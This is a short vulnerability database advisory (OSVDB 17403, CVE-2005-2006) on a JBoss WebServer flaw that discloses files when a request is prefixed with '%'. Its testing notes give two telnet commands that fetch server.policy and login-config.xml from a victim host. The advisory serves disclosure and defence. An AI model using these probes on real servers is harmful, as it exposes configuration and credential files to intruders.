JBoss org.jboss.web.WebServer Class % File Request Source Disclosure

2005-06-17T06:45:09
ID OSVDB:17403
Type osvdb
Reporter OSVDB
Modified 2005-06-17T06:45:09

Description

Manual Testing Notes

$ telnet [victim] 8083 GET %server.policy HTTP/1.0

$ telnet [victim] 8083 GET %login-config.xml

References:

Vendor URL: http://www.illegalaccess.org/java/jboss_path.php Vendor Specific Advisory URL Vendor Specific Advisory URL Vendor Specific Advisory URL Security Tracker: 1014234 Secunia Advisory ID:21118 Secunia Advisory ID:18789 Secunia Advisory ID:15746 Secunia Advisory ID:17559 Related OSVDB ID: 17402 Related OSVDB ID: 17404 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0044.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0144.html CVE-2005-2006